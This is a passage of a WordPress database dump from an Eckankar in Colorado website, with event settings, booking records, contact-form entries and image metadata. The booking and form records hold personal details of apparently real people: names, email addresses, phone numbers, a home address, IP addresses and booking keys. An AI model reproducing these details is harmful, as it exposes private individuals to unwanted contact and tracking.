text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(170074,267237,'mec_event_status','EventScheduled'),(170075,267237,'mec_moved_online_link',''),(170076,267237,'mec_cancelled_reason',''),(170077,267237,'mec_display_cancellation_reason_in_single_page',''),(170078,267237,'protect_children',''),(170079,267237,'passster_activate_global_protection',NULL),(170080,267237,'passster_activate_protection',NULL),(170081,267237,'passster_protection_type','password'),(170082,267237,'boldgrid_hide_page_title','0'),(170083,267237,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(170084,267237,'boldgrid_in_page_containers','1'),(170088,267237,'_dp_original','266540'),(170086,267237,'_thumbnail_id','266720'),(170087,267237,'_wp_old_date','2022-04-30'),(170089,267237,'_edit_lock','1663644386:2'),(170090,267237,'_edit_last','2'),(193667,269200,'_field_649',''),(193668,269200,'_form_id','61'),(193645,269197,'_seq_num','56'),(193646,269198,'_field_654','Lynn'),(193647,269198,'_field_652','Schulte'),(193648,269198,'_field_653','lynnschultept@gmail.com'),(191657,269030,'_seq_num','4'),(171337,267341,'mec_color',''),(171336,267341,'protect_children',''),(170101,267240,'_field_133','Jeffrey'),(170102,267240,'_field_134','Custer'),(170103,267240,'_field_135','jcuster2805@gmail.com'),(170104,267240,'_field_137','No capcha on email update members page'),(170105,267240,'_field_138','No capcha on email update members page'),(170106,267240,'_form_id','13'),(170107,267240,'_seq_num','118'),(170108,267241,'_field_30','Jeffrey'),(170109,267241,'_field_31','Custer'),(170110,267241,'_field_32','(303) 827-4095'),(170111,267241,'_field_33','jcuster2805@gmail.com'),(170112,267241,'_field_34','2435 Lillie Ct, #116'),(170113,267241,'_field_35','Longmont, CO 80504, USA'),(170114,267241,'_field_36','CO'),(170115,267241,'_field_37','US'),(170116,267241,'_field_39','Please update my email address - thanks! I had to use the capcha on the non members page to get a capcha here.'),(170117,267241,'_form_id','4'),(170118,267241,'_seq_num','25'),(170119,267242,'_field_450','Jeffrey'),(170120,267242,'_field_451','Custer'),(170121,267242,'_field_458','3038274095'),(170122,267242,'_field_452','jcuster2805@gmail.com'),(170123,267242,'_field_453','Sri Harold\'s Talk'),(170124,267242,'_field_454','Will there be a Sunday presentation of his Saturday talk at Worldwide?'),(170125,267242,'_form_id','49'),(170126,267242,'_seq_num','9'),(170127,267243,'mec_transaction_id','HPM19481'),(170128,267243,'mec_user_id','1000015'),(170129,267243,'mec_verified','1'),(170130,267243,'mec_verification_key','6e563ebfa70aa4b35958b286e59360cb'),(170131,267243,'mec_cancellation_key','8356295635e26c211a63a036342f96eb'),(170132,267243,'mec_confirmed','1'),(170133,267243,'mec_event_id','266611'),(170134,267243,'mec_date','1663700400:1663704000'),(170135,267243,'mec_ticket_id',',1,'),(170136,267243,'mec_booking_time','2022-09-20 18:47:28'),(170137,267243,'mec_all_dates','a:0:{}'),(170138,267243,'mec_other_dates','a:0:{}'),(170139,267243,'mec_attention_time','1663700400:1663704000'),(170140,267243,'mec_attention_time_start','1663700400'),(170141,267243,'mec_attention_time_end','1663704000'),(170142,267243,'mec_book_date_submit','20220920184728'),(170143,267243,'mec_booking_location','144'),(170144,267243,'mec_ticket_price_1','0'),(170145,267243,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"68.114.225.164\";}}'),(170146,267243,'mec_price','0'),(170147,267243,'mec_gateway','MEC_gateway_free'),(170148,267243,'mec_gateway_label','Free'),(170359,267268,'protect_children',''),(170150,267246,'_edit_lock','1663779620:2'),(170151,267246,'_edit_last','2'),(170152,267246,'_wp_page_template','default'),(170153,267246,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(170154,267246,'passster_activate_global_protection',NULL),(170155,267246,'passster_activate_protection',NULL),(170156,267246,'passster_protection_type','password'),(170157,267246,'boldgrid_hide_page_title','0'),(170158,267246,'protect_children',''),(170159,267246,'boldgrid_in_page_containers','1'),(170160,267246,'bgseo_robots_index','index'),(170161,267246,'bgseo_robots_follow','follow'),(191656,269030,'_form_id','61'),(191655,269030,'_field_649',''),(191654,269030,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(191653,269030,'_field_651','(720) 985-8930'),(191652,269030,'_field_653','mccannlisam@gmail.com'),(170170,267252,'protect_children',''),(170171,267252,'mec_color',''),(170172,267252,'mec_location_id','118'),(170173,267252,'mec_dont_show_map','0'),(170174,267252,'mec_organizer_id','1'),(170175,267252,'mec_read_more',''),(170176,267252,'mec_more_info',''),(170177,267252,'mec_more_info_title',''),(170178,267252,'mec_more_info_target','_self'),(170179,267252,'mec_cost',''),(170180,267252,'mec_currency','a:0:{}'),(170181,267252,'mec_additional_organizer_ids','a:0:{}'),(170182,267252,'mec_additional_location_ids','a:0:{}'),(170183,267252,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-05\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-05\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(170184,267252,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(170185,267252,'mec_certain_weekdays','a:0:{}'),(170186,267252,'mec_allday','0'),(170187,267252,'one_occurrence','0'),(170188,267252,'mec_hide_time','0'),(170189,267252,'mec_hide_end_time','0'),(170190,267252,'mec_comment',''),(170191,267252,'mec_timezone','global'),(170192,267252,'mec_countdown_method','global'),(170193,267252,'mec_public','1'),(170194,267252,'mec_start_date','2022-10-05'),(170195,267252,'mec_start_time_hour','7'),(170196,267252,'mec_start_time_minutes','0'),(170197,267252,'mec_start_time_ampm','PM'),(170198,267252,'mec_start_day_seconds','68400'),(170199,267252,'mec_end_date','2022-10-05'),(170200,267252,'mec_end_time_hour','8'),(170201,267252,'mec_end_time_minutes','0'),(170202,267252,'mec_end_time_ampm','PM'),(170203,267252,'mec_end_day_seconds','72000'),(170204,267252,'mec_repeat_status','0'),(170205,267252,'mec_repeat_type',''),(170206,267252,'mec_repeat_interval','1'),(170207,267252,'mec_repeat_end',''),(170208,267252,'mec_repeat_end_at_occurrences',''),(170209,267252,'mec_repeat_end_at_date',''),(170210,267252,'mec_advanced_days','a:0:{}'),(170211,267252,'mec_in_days',''),(170212,267252,'mec_not_in_days',''),(170213,267252,'mec_hourly_schedules','a:0:{}'),(170214,267252,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(170215,267252,'mec_tickets','a:0:{}'),(170216,267252,'mec_fees_global_inheritance','1'),(170217,267252,'mec_fees','a:0:{}'),(170218,267252,'mec_ticket_variations_global_inheritance','1'),(170219,267252,'mec_ticket_variations','a:0:{}'),(170220,267252,'mec_reg_fields_global_inheritance','1'),(170221,267252,'mec_reg_fields','a:0:{}'),(170222,267252,'mec_bfixed_fields','a:0:{}'),(170223,267252,'mec_op','a:0:{}'),(170224,267252,'mec_fields','a:0:{}'),(170225,267252,'mec_event_status','EventScheduled'),(170226,267252,'mec_moved_online_link',''),(170227,267252,'mec_cancelled_reason',''),(170228,267252,'mec_display_cancellation_reason_in_single_page',''),(170229,267252,'boldgrid_hide_page_title','0'),(170230,267252,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(170231,267252,'passster_activate_global_protection',NULL),(170232,267252,'passster_activate_protection',NULL),(170233,267252,'passster_protection_type','password'),(170236,267252,'_dp_original','266104'),(170235,267252,'boldgrid_in_page_containers','1'),(170237,267252,'_edit_lock','1663815353:2'),(170238,267252,'_edit_last','2'),(191651,269030,'_field_652','McCann'),(191650,269030,'_field_654','Lisa'),(191649,269029,'mec_local_timezone','America/Denver'),(191647,269029,'mec_price','0'),(191648,269029,'mec_payable','0'),(170260,267256,'smush-info','The file was compressed from 92.08 KB to 75.56 KB saving 17.95 percent using WP-Optimize'),(170261,267256,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:94291;s:12:\"smushed-size\";i:77369;s:15:\"savings-percent\";d:17.95;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:94291;s:10:\"compressed\";i:77369;}s:6:\"medium\";a:2:{s:8:\"original\";i:12850;s:10:\"compressed\";i:8857;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9400;s:10:\"compressed\";i:5385;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:57901;s:10:\"compressed\";i:50996;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20449;s:10:\"compressed\";i:15837;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29043;s:10:\"compressed\";i:23797;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:20337;s:10:\"compressed\";i:15807;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24949;s:10:\"compressed\";i:20107;}}}'),(188218,268837,'mec_ticket_variations_global_inheritance','1'),(188219,268837,'mec_ticket_variations','a:0:{}'),(170264,267252,'_thumbnail_id','267256'),(191646,269029,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"73.243.23.51\";}}'),(191645,269029,'mec_ticket_price_1','0'),(191644,269029,'mec_booking_location','129'),(191642,269029,'mec_attention_time_end','1694345400'),(191643,269029,'mec_book_date_submit','20230910103717'),(191641,269029,'mec_attention_time_start','1694341800'),(170259,267256,'smush-complete','1'),(170258,267256,'original-file','2022/09/blue-white-connection-2-updraft-pre-smush-original.jpg'),(170256,267256,'_wp_attached_file','2022/09/blue-white-connection-2.jpg'),(170257,267256,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:817;s:6:\"height\";i:462;s:4:\"file\";s:35:\"2022/09/blue-white-connection-2.jpg\";s:8:\"filesize\";i:94291;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12850;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9400;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57901;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20449;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29043;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20337;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"blue-white-connection-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24949;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:5:\"5.0.2\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:5:\"5.0.2\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191640,269029,'mec_attention_time','1694341800:1694345400'),(191639,269029,'mec_other_dates','a:0:{}'),(191638,269029,'mec_all_dates','a:0:{}'),(191637,269029,'mec_booking_time','2023-09-10 10:37:17'),(191636,269029,'mec_ticket_id',',1,'),(191635,269029,'mec_date','1694341800:1694345400'),(191634,269029,'mec_event_id','268730'),(191633,269029,'mec_confirmed','1'),(191632,269029,'mec_cancellation_key','db2d60867d056bbba9cabfd0088c3e89'),(191631,269029,'mec_verification_key','c014a4141e52132f882d270e817b5c58'),(191630,269029,'mec_verified','1'),(170294,267260,'mec_confirmed','1'),(170295,267260,'mec_event_id','266604'),(170296,267260,'mec_date','1665920700:1665925200'),(170297,267260,'mec_ticket_id',',1,'),(170298,267260,'mec_booking_time','2022-09-25 05:02:56'),(170299,267260,'mec_all_dates','a:0:{}'),(170300,267260,'mec_other_dates','a:0:{}'),(170301,267260,'mec_attention_time','1665920700:1665925200'),(170302,267260,'mec_attention_time_start','1665920700'),(170303,267260,'mec_attention_time_end','1665925200'),(170304,267260,'mec_book_date_submit','20220925050256'),(170305,267260,'mec_booking_location','118'),(170306,267260,'mec_ticket_price_1','0'),(170307,267260,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"68.114.225.164\";}}'),(170308,267260,'mec_price','0'),(170309,267260,'mec_gateway','MEC_gateway_free'),(170310,267260,'mec_gateway_label','Free'),(191629,269029,'mec_user_id','1000061'),(191628,269029,'mec_gateway_label','Free'),(191627,269029,'mec_gateway','MEC_gateway_free'),(191625,269028,'mec_local_timezone','America/Denver'),(191626,269029,'mec_transaction_id','KSW83620'),(191624,269028,'mec_payable','0'),(191623,269028,'mec_price','0'),(191622,269028,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(191621,269028,'mec_ticket_price_1','0'),(191620,269028,'mec_booking_location','129'),(191619,269028,'mec_book_date_submit','20230910071629'),(191618,269028,'mec_attention_time_end','1694345400'),(191617,269028,'mec_attention_time_start','1694341800'),(191616,269028,'mec_attention_time','1694341800:1694345400'),(191615,269028,'mec_other_dates','a:0:{}'),(191614,269028,'mec_all_dates','a:0:{}'),(191613,269028,'mec_booking_time','2023-09-10 07:16:29'),(191612,269028,'mec_ticket_id',',1,'),(191611,269028,'mec_date','1694341800:1694345400'),(191610,269028,'mec_event_id','268730'),(191609,269028,'mec_confirmed','1'),(191608,269028,'mec_cancellation_key','2abf9c67f430af94acf43efa8a89e349'),(191607,269028,'mec_verification_key','6c1f57734f6aa94880d285b3f2364795'),(191606,269028,'mec_verified','1'),(191605,269028,'mec_user_id','1000021'),(191604,269028,'mec_gateway_label','Free'),(191603,269028,'mec_gateway','MEC_gateway_free'),(191602,269028,'mec_transaction_id','PFH36224'),(191600,269027,'mec_payable','0'),(191601,269027,'mec_local_timezone','America/Chicago'),(191599,269027,'mec_price','0'),(170364,267268,'mec_read_more',''),(170365,267268,'mec_more_info',''),(170366,267268,'mec_more_info_title',''),(170367,267268,'mec_more_info_target','_self'),(170368,267268,'mec_cost',''),(170369,267268,'mec_currency','a:0:{}'),(170370,267268,'mec_additional_organizer_ids','a:0:{}'),(170371,267268,'mec_additional_location_ids','a:0:{}'),(170372,267268,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-29\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-29\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(170373,267268,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(170374,267268,'mec_certain_weekdays','a:0:{}'),(170375,267268,'mec_allday','0'),(170376,267268,'one_occurrence','0'),(170377,267268,'mec_hide_time','0'),(170378,267268,'mec_hide_end_time','0'),(170379,267268,'mec_comment',''),(170380,267268,'mec_timezone','global'),(170381,267268,'mec_countdown_method','global'),(170382,267268,'mec_public','1'),(170383,267268,'mec_start_date','2022-10-29'),(170384,267268,'mec_start_time_hour','10'),(170385,267268,'mec_start_time_minutes','0'),(170386,267268,'mec_start_time_ampm','AM'),(170387,267268,'mec_start_day_seconds','36000'),(170388,267268,'mec_end_date','2022-10-29'),(170389,267268,'mec_end_time_hour','11'),(170390,267268,'mec_end_time_minutes','0'),(170391,267268,'mec_end_time_ampm','AM'),(170392,267268,'mec_end_day_seconds','39600'),(170393,267268,'mec_repeat_status','0'),(170394,267268,'mec_repeat_type',''),(170395,267268,'mec_repeat_interval','1'),(170396,267268,'mec_repeat_end',''),(170397,267268,'mec_repeat_end_at_occurrences',''),(170398,267268,'mec_repeat_end_at_date',''),(170399,267268,'mec_advanced_days','a:0:{}'),(170400,267268,'mec_in_days',''),(170401,267268,'mec_not_in_days',''),(170402,267268,'mec_hourly_schedules','a:0:{}'),(170403,267268,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(170404,267268,'mec_tickets','a:0:{}'),(170405,267268,'mec_fees_global_inheritance','1'),(170406,267268,'mec_fees','a:0:{}'),(170407,267268,'mec_ticket_variations_global_inheritance','1'),(170408,267268,'mec_ticket_variations','a:0:{}'),(170409,267268,'mec_reg_fields_global_inheritance','1'),(170410,267268,'mec_reg_fields','a:0:{}'),(170411,267268,'mec_bfixed_fields','a:0:{}'),(170412,267268,'mec_op','a:0:{}'),(170413,267268,'mec_fields','a:0:{}'),(170414,267268,'mec_event_status','EventScheduled'),(170415,267268,'mec_moved_online_link',''),(170416,267268,'mec_cancelled_reason',''),(170417,267268,'mec_display_cancellation_reason_in_single_page',''),(170418,267268,'boldgrid_hide_page_title','0'),(170419,267268,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(170420,267268,'passster_activate_global_protection',NULL),(170421,267268,'passster_activate_protection',NULL),(170422,267268,'passster_protection_type','password'),(170425,267268,'_dp_original','266104'),(170424,267268,'boldgrid_in_page_containers','1'),(170426,267268,'_edit_lock','1664422148:2'),(170427,267268,'_edit_last','2'),(170428,267269,'_wp_attached_file','2022/09/fam-girls-3.jpg'),(170429,267269,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:817;s:6:\"height\";i:487;s:4:\"file\";s:23:\"2022/09/fam-girls-3.jpg\";s:8:\"filesize\";i:110845;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20634;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9946;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-768x458.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:458;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88267;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29978;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47034;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34289;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"fam-girls-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34761;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(170430,267268,'_thumbnail_id','267269'),(191598,269027,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.45.55\";}}'),(191597,269027,'mec_ticket_price_1','0'),(191596,269027,'mec_booking_location','129'),(191589,269027,'mec_booking_time','2023-09-09 23:05:04'),(191588,269027,'mec_ticket_id',',1,'),(191587,269027,'mec_date','1694341800:1694345400'),(191586,269027,'mec_event_id','268730'),(191585,269027,'mec_confirmed','1'),(191584,269027,'mec_cancellation_key','46bbb29cfd56ba20bf89efb8b041d629'),(191583,269027,'mec_verification_key','d9b2375f606d8f1f1cb7f8272fd6d427'),(191582,269027,'mec_verified','1'),(191580,269027,'mec_gateway_label','Free'),(191581,269027,'mec_user_id','1000023'),(191579,269027,'mec_gateway','MEC_gateway_free'),(191578,269027,'mec_transaction_id','UHB34927'),(191577,269023,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:206873;s:12:\"smushed-size\";i:206873;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:206873;s:10:\"compressed\";i:206873;}s:6:\"medium\";a:2:{s:8:\"original\";i:15613;s:10:\"compressed\";i:14913;}s:5:\"large\";a:2:{s:8:\"original\";i:82930;s:10:\"compressed\";i:81902;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6560;s:10:\"compressed\";i:6018;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:52811;s:10:\"compressed\";i:51724;}s:9:\"